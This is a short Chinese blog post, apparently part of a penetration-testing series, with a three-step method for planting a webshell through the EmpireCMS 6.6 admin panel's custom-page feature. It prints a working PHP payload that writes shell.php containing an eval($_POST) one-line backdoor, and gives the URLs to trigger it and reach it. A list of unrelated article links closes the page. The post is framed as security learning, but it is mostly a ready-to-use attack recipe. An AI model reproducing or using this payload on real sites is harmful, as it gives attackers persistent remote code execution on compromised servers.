121.网络安全渗透测试—[CMS后台 getwebshell]—[帝国empirecms6.6后台 getwebshell]
2023-09-27 14:28:02 时间
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!
一、帝国empirecms6.6后台 getwebshell
1、第一步:自定义页面
登录后台---->栏目---->自定义页面---->增加自定义页面---->填写页面名称为wshell.php(随便)---->文件名默认是…/…/page.html---->文件内容为以下内容:功能是创建shell.php文件并写入一句话到shell.php文件中
<?php fputs(fopen("shell.php","a"),'<?php phpinfo();eval($_POST[123]);?>')?>
2、第二步:触发写入一句话
栏目---->自定义页面---->管理自定义页面---->点击刚刚的page.html页面触发webshell(其实就是访问http://www.empirecms66.com/page.html)
3、第三步:getwebshell
访问生成的webshell:http://www.empirecms66.com/e/admin/shell.php
相关文章
- 第七节:语法总结(1)(自动属性、out参数、对象初始化器、var和dynamic等) 图片放大镜 JavaScript-基础 用javascript写原生ajax(笔记) 初遇 Asp.net MVC 数据库依赖缓存那些事儿 前端JS 与 后台C# 之间JSON序列化与反序列化(笔记)
- 使用react全家桶制作博客后台管理系统 网站PWA升级 移动端常见问题处理 循序渐进学.Net Core Web Api开发系列【4】:前端访问WebApi [Abp 源码分析]四、模块配置 [Abp 源码分析]三、依赖注入
- 工作总结 返回 json 后台对象中,某一个字段设为string 整个对象转换为json 返回到页面中
- 后台开发:核心技术与应用实践3.3.2 vector的查增删
- Java项目(前端vue后台java微服务)在线考试系统(java+vue+springboot+mysql+maven)
- Android后台杀死系列之一:FragmentActivity及PhoneWindow后台杀死处理机制
- 一套简单通用的Java后台管理系统,拿来即用,非常方便(附项目地址)
- 后台运行一个go程序
- 「基于Python技术的智慧中医商业项目」问诊模块后台管理
- ios NSURLSession使用说明及后台工作流程分析
- 去除安装程序的窗口显示(类似于后台安装)
- HM后台优化上线(七)
- Python + Django配置后台管理系统
- https双向认证訪问管理后台,採用USBKEY进行系统訪问的身份鉴别,KEY的证书长度大于128位,使用USBKEY登录
- Django+Vue项目学习第一篇:django后台搭建
- java代码中后台向前台传递list或map集合案例